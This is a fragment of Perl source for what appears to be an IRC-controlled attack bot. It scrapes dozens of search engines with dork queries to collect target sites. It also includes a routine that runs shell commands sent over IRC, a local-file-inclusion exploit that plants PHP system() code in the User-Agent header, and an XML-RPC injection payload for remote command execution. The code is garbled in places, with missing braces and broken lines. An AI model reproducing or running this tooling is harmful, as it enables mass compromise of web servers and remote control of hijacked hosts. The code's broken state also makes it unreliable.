my $search = ("http://search.yippy.com/search?query=".&key($key)."&input-
form=clusty-simple&v:sources=webplus&v:state=root|root-".$b."-10|0&");

my $res = &search_engine_query($search);

if ($res !~ /next/) {$b=500;}

while ($res =~ m/<div class=\"document-header\"><a

href=\"http:\/\/(.*?)\"><span class=\"title\">/g) {

if ($1 !~ /yippy\.com/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

sub gutser() {

my @list;
 my $key = $_[0];

for ($b=1; $b<=50; $b+=1) {

my $search = ("http://www.goodsearch.com/Search.aspx?
Keywords=".&key($key)."&page=".$b."&osmax=0");

my $res = &search_engine_query($search);

while ($res =~ m/http:\/\/([^>\"]*)\">/g) {

if ($1 !~ /goodsearch|good\.is|w3\.org|quantserve/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

sub google2() {

my @list;

my $key = $_[0];

my $b = 0;

my @doms =
("ae","com.af","com.ag","off.ai","am","com.ar","as","at","com.au","az","ba","com.bd
","be","bg","bi","com.bo","com.br","bs","co.bw","com.bz","ca","cd","cg","ch","ci","
co.ck","cl","com.co","co.cr","com.cu","de","dj","dk","dm","com.do","com.ec","es","c
om.et","fi","com.fj","fm","fr","gg","com.gi","gl","gm","gr","com.gt","com.hk","hn",
"hr","co.hu","co.id","ie","co.il","co.im","co.in","is","it","co.je","com.jm","jo","
co.jp","co.ke","kg","co.kr","kz","li","lk","co.ls","lt","lu","lv","com.ly","mn","ms
","com.mt","mu","mw","com.mx","com.my","com.na","com.nf","com.ni","nl","no","com.np
","nr","nu","co.nz","com.om","com.pa","com.pe","com.ph","com.pk","pl","pn","com.pr"
,"pt","com.py","ro","ru","rw","com.sa","com.sb","sc","se","com.sg","sh","sk","sn","
sm","com.sv","co.th","com.tj","tm","to","tp","com.tr","tt","com.tw","com.ua","co.ug
","co.uk","com.uy","uz","com.vc","co.ve","vg","co.vi","com.vn","vu","ws","co.za","c
o.zm");

foreach my $domain (@doms) { $dom = $doms[rand(scalar(@doms))];

for ($b=1; $b<=200; $b+=10) {

my $search = ("http://www.google.".$dom."/search?
num=50&q=".&key($key)."&start=".$b."&sa=N");

my $res = &search_engine_query($search);

while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {

if ($1 !~ /google/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

} return @list;

}
sub exalead() {

my @list;

my $key = $_[0];

for ($b=0; $b<=1000; $b+=100) {

my $search = ("http://www.exalead.com/search/web/results/?
q=".&key($key)."&elements_per_page=100&start_index=".$b);

my $res = &search_engine_query($search);

if ($res =~ m/<span id=\"topNextUrl\">/g) {$b=1000;}

while ($res =~ m/<a class=\"thumbnail\" href=\"http:\/\/(.*?)\"/g) {

my $link = $1;

if ($link!~ /exalead/){

my @grep = &links($link);

push(@list,@grep);

return @list;

sub lycos() {
 my @list;

my $key = $_[0];

for ($b=0; $b<=50; $b+=1) {

my $search = ("http://search.lycos.com/?query=".&key($key)."&page2=".
$b."&tab=web&searchArea=web&diktfc=468007302EF7DB9AFE53D4138B848E7B4000D424385F");

my $res = &search_engine_query($search);

while ($res =~ m/href=\"http:\/\/(.+?)\" onmouseover=/g) {

if ($1 !~ /lycos\.com/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

sub virgilio() {

my @list;

my $key = $_[0];

for ($b=10; $b<=500; $b+=10) {

 my $search = ("http://ricerca.virgilio.it/ricerca?
qs=".&key($key)."&filter=1&site=&lr=&hits=10&offset=".$b);

my $res = &search_engine_query($search);

if ($res =~ m/non ha prodotto risultati/i) {$b=500;}

if ($res =~ m/riconducibile a richieste effettuate/i) {$b=500;}

while ($res =~ m/<a href=\"http:\/\/(.+?)\" target=\"/g) {

if ($1 !~ /\.virgilio\.it/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

sub webde() {

my @list;

my $key = $_[0];

for ($b=1; $b<=50; $b+=1) {

 my $search = ("http://suche.web.de/search/web/?pageIndex=".
$b."&su=".&key($key)."&search=Suche&webRb=countryDE");

my $res = &search_engine_query($search);

if ($res =~ m/Suchbegriff nicht gefunden/i) {$b=50;}

while ($res =~ m/<span class=\"url\">http:\/\/(.*?)<\/span>/g) {

my $link = $1;

if ($link!~ /suche|web/){

my @grep = &links($link);

push(@list,@grep);

return @list;

sub hotbot() {

my @list;

my $key = $_[0];

for ($b=0; $b<=50; $b+=1) {

my $search = ("http://www.hotbot.com/?
query=".&key($key)."&ps=&loc=searchbox&tab=web&mode=search&currProv=msn&page=".
$b."&diktfc=51964BFDE35DFB6914F9E1E0D7988C3AC0ACB52B58BE");
 my $res = &search_engine_query($search);

if ($res =~ m/had no web result/i) {$b=50;}

while ($res =~ m/rel=\"nofollow\" href=\"http:\/\/(.+?)\"/g) {

if ($1 !~ /hotbot\.com/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

sub aol() {

my @list;

my $key = $_[0];

for ($b=2; $b<=50; $b+=1) {

my $search = ("http://aim.search.aol.com/aol/search?
q=".&key($key)."&page=".$b);

my $res = &search_engine_query($search);
 while ($res =~ m/href=\"http:\/\/(.*?)\" property/g) {

if ($1 !~ /aol\.com/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

sub sapo(){

my @list;

my $key = $_[0];

for ($b=1; $b<=50; $b+=1) {

my $search = ("http://pesquisa.sapo.pt/?
barra=resumo&cluster=0&format=html&limit=10&location=pt&page=".
$b."&q=".&key($key)."&st=local");

my $res = &search_engine_query($search);

if ($res !~ m/Next/i) {$b=50;}

while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) {

 if ($1 !~ /\.sapo\.pt/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

sub duck() {

my @list;

my $key = $_[0];

my $b = 0;

for ($b=1; $b<=50; $b+=1) {

my $search = ("http://duckduckgo.com/html/?
q=".&key($key)."&t=A&l=en&p=1&s=".$b."&o=json&dc=".$b."&api=d.js");

my $res = &search_engine_query($search);

if ($res =~ m/No more results/i) {$b=50;}

while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) {

 if ($1 !~ /duckduckgo/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

sub lygo() {

my @list;

my $key = $_[0];

my $b = 0;

for ($b=0; $b<=50; $b+=1) {

my $search = ("http://www.hotbot.com/?
query=".&key($key)."&ps=&loc=searchbox&tab=web&mode=search&currProv=lygo&page2=".
$b."&diktfc=51964BFDE35DFB6914F9E1E0D7988C3AC0ACB52B58BE");

my $res = &search_engine_query($search);

if ($res =~ m/had no web result/i) {$b=50;}

while ($res =~ m/<a href=\"http:\/\/(.+?)\"><img/g) {

 if ($1 !~ /hotbot\.com/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

sub yause() {

my @list;

my $key = $_[0];

my $b = 0;

for ($b=1; $b<=50; $b+=1) {

my $search = ("http://www.yauba.com/?
query=".&key($key)."&where=websites&target=websites&con=y&ilang=english&clt=topic&p
g=".$b);

my $res = &search_engine_query($search);

if ($res !~ m/Next/i) {$b=50;}

while ($res =~ m/<h1><a rel=\"nofollow\" href=\"http:\/\/(.+?)\"

onfocus=/g) {
 if ($1 !~ /yauba\.com/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

sub baidu() {

my @list;

my $key = $_[0];

my $b = 0;

for ($b=0; $b<=500; $b+=10) {

my $search = ("http://www.baidu.com/s?wd=".&key($key)."&pn=".$b);

my $res = &search_engine_query($search);

while ($res =~ m/\" href=\"http:\/\/(.*?)\" target=/g) {

if ($1 !~ /baidu\.com/){

my $link = $1;
 my @grep = &links($link);

push(@list,@grep);

return @list;

sub kipot() {

my @list;

my $key = $_[0];

my $b = 0;

for ($b=1; $b<=50; $b+=1) {

my $search = ("http://www.qkport.com/".$b."/web/".&key($key));

my $res = &search_engine_query($search);

while ($res =~ m/href=\"http:\/\/(.*?)\" target=\"_top\"/g) {

if ($1 !~ /qkport\.com/){

my $link = $1;

my @grep = &links($link);
 push(@list,@grep);

return @list;

sub gibla() { #mati#

my @list;

my $key = $_[0];

my $hal = "/search?q=".&key($key);

my $search = ("http://www.gigablast.com".$hal);

my $res = &search_engine_query($search);

while ($res =~ m/Next 10 Results/) {

$search = ("http://www.gigablast.com".$hal);

while ($res =~ m/<span class=\"url\">(.+?)><\/span>/g) {

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

}
if ($res =~ m/<center><a href=\"(.*?)\">/) { $hal = $1; }

$res = &search_engine_query($search);

}return @list;

sub black() {

my @list;

my $key = $_[0];

my $b = 0;

for ($b=0; $b<=50; $b+=1) {

my $search = ("http://blekko.com/ws/".&key($key)."?ft=&p=".$b);

my $cek = $b+1;

my $res = &search_engine_query($search);

if ($res !~ m/<strong>$b<\/strong>/i) {$b=50;}

while ($res =~ m/class=\"UrlTitleLine\" href=\"http:\/\/(.+?)\"/g) {

if ($1 !~ /blekko/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

}
 }

return @list;

sub onet() {

my @list;

my $key = $_[0];

my $b = 0;

for ($b=1; $b<=50; $b+=1) {

my $search = ("http://szukaj.onet.pl/".$b.",query.html?qt=".&key($key));

my $res = &search_engine_query($search);

while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) {

if ($1 !~ /webcache|query/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

}
 }

return @list;

sub sizuka() {

my @list;

my $key = $_[0];

my $b = 0;

for ($b=10; $b<=100; $b+=10) {

my $search = ("http://www.szukacz.pl/szukaj.aspx?
ct=polska&pc=polska&q=".&key($key)."&start=".$b);

my $res = &search_engine_query($search);

while ($res =~ m/<a title=\"http:\/\/(.+?)\"/g) {

if ($1 !~ /szukacz/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;
}

sub walla() {

my @list;

my $key = $_[0];

my $b = 0;

for ($b=0; $b<=50; $b+=1) {

my $search = ("http://search.walla.co.il/?t=0&e=utf&q=".&key($key)."&p=".
$b);

my $res = &search_engine_query($search);

while ($res =~ m/<td class=sw><a href=\"http:\/\/(.+?)\"/g) {

if ($1 !~ /walla\.co\.il/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

}
sub demos() {

my @list;

my $key = $_[0];

my $b = 0;

for ($b=0; $b<=500; $b+=10) {

my $search = ("http://search.dmoz.org/search/search?
q=".&key($key)."&start=".$b."&type=next&all=yes");

my $res = &search_engine_query($search);

while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) {

if ($1 !~ /search|dmoz/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

}
sub rose() {

my @list;

my $key = $_[0];

my $b = 0;

my @langs =
("de","nl","fi","ps","da","en","es","fr","it","no","sv","cs","pl","ru");

foreach my $language (@langs) { $lang = $langs[rand(scalar(@langs))];

for ($b=0; $b<=30; $b+=10) {

my $search = ("http://euroseek.com/system/search.cgi?language=".
$lang."&mode=internet&start=".$b."&string=".&key($key));

my $res = &search_engine_query($search);

while ($res =~ m/<a href=\"http:\/\/(.+?)\" class=/g) {

if ($1 !~ /euroseek/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

}return @list;

}
sub seznam() {

my @list;

my $key = $_[0];

for ($b=1; $b<=500; $b+=10) {

my $search = ("http://search.seznam.cz/?
q=".&key($key)."&count=10&pId=SkYLl2GXwV0CZZUQcglt&from=".$b);

my $res = &search_engine_query($search);

while ($res =~ m/<a href=\"http:\/\/(.+?)\" title/g) {

if ($1 !~ /seznam/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

sub tiscali() {

my @list;
my $key = $_[0];

for ($b=0; $b<=500; $b+=10) {

my $search = ("http://search.tiscali.it/?
tiscalitype=web&collection=web&start=".$b."&q=".&key($key));

my $res = &search_engine_query($search);

while ($res =~ m/<a href=\"http:\/\/(.+?)\" onclick/g) {

if ($1 !~ /tiscali/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

sub naver() {

my @list;

my $key = $_[0];

for ($b=1; $b<=500; $b+=10) {

 my $search = ("http://web.search.naver.com/search.naver?
where=webkr&query=".&key($key)."&docid=0&#9001;=all&f=&srcharea=all&st=s&fd=2&start
=".$b."&display=10");

my $res = &search_engine_query($search);

while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) {

if ($1 !~ /naver/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

#########################################

sub clean() {

my @cln = ();

my %visit = ();
 foreach my $element (@_) {

$element =~ s/\/+/\//g;

next if $visit{$element}++;

push @cln, $element;

return @cln;

sub key() {

my $dork = $_[0];

$dork =~ s/ /\+/g;

$dork =~ s/:/\%3A/g;

$dork =~ s/\//\%2F/g;

$dork =~ s/\?/\%3F/g;

$dork =~ s/&/\%26/g;

$dork =~ s/\"/\%22/g;

$dork =~ s/,/\%2C/g;

$dork =~ s/\\/\%5C/g;

$dork =~ s/@/\%40/g;

$dork =~ s/\[/\%5B/g;
$dork =~ s/\]/\%5D/g;

$dork =~ s/\?/\%3F/g;

$dork =~ s/\=/\%3D/g;

$dork =~ s/\|/\%7C/g;

return $dork;

sub links() {

my @list;

my $link = $_[0];

my $host = $_[0];

my $hdir = $_[0];

$hdir =~ s/(.*)\/[^\/]*$/$1/;

$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;

$host .= "/";

$link .= "/";

$hdir .= "/";

$host =~ s/\/\//\//g;

$hdir =~ s/\/\//\//g;
 $link =~ s/\/\//\//g;

push(@list,$link,$host,$hdir);

return @list;

sub search_engine_query($) {

my $url = $_[0];

$url =~ s/http:\/\///;

my $host = $url;

my $query = $url;

my $page = "";

$host =~ s/href=\"?http:\/\///;

$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;

$query =~ s/$host//;

if ($query eq "") { $query = "/"; }

eval {

my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80",

Proto=>"tcp") or return;

print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-

Agent: $uagent\r\n\r\n";

my @pages = <$sock>;
 $page = "@pages";

close($sock);

};

return $page;

#########################################

sub shell() {

my $path = $_[0];

my $cmd = $_[1];

if ($cmd =~ /cd (.*)/) {

chdir("$1") || &msg("$path","#4,1No such file or directory");

return;

elsif ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

my @output = `$cmd 2>&1 3>&1`;

my $c = 0;

foreach my $output (@output) {

 $c++;

chop $output;

&msg("$path","$output");

if ($c == 5) { $c = 0; sleep 2; }

exit;

}}

sub isAdmin() {

my $status = 0;

my $nick = $_[0];

if ($nick eq $admin) { $status = 1; }

return $status;

sub msg() {

return unless $#_ == 1;

sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]");

}
sub nick() {

return unless $#_ == 0;

sendraw("NICK $_[0]");

sub notice() {

return unless $#_ == 1;

sendraw("NOTICE $_[0] :$_[1]");

sub cmdlfi() {

my $browser = LWP::UserAgent->new;

my $url = $_[0];

my $cmd = $_[1];

my $chan = $_[2];

my $hie = "j13mbut<?system(\"$cmd 2> /dev/stdout\"); ?>j13mbut";

$browser->agent("$hie");

$browser->timeout(7);
$response = $browser->get( $url );

if ($response->content =~ /j13mbut(.*)j13mbut/s) {

&msg("$chan","#15,1(#4@9CMDLFI#15)#9 $1#");

} else {

&msg("$chan","#15,1(#4@9CMDLFI#15)#4 No Output#");

sub cmdxml() {

my $jed = $_[0];

my $dwa = $_[1];

my $chan = $_[2];

my $userAgent = LWP::UserAgent->new(agent => 'perl post');

$exploit = "<?xml version=\"1.0\"?><methodCall>";

$exploit .= "<methodName>test.method</methodName>";

$exploit .= "<params><param><value><name>',''));";

$exploit .= "echo'bamby';system('".
$dwa."');echo'solo';exit;/*</name></value></param></params></methodCall>";

my $response = $userAgent->request(POST $jed,Content_Type => 'text/xml',Content =>

$exploit);

if ($response->content =~ /bamby(.*)solo/s) {
&msg("$chan","#15,1(#4@9CMDXML#15)#9 $1#");

} else {

&msg("$chan","#15,1(#4@9CMDXML#15)#4 No Output#");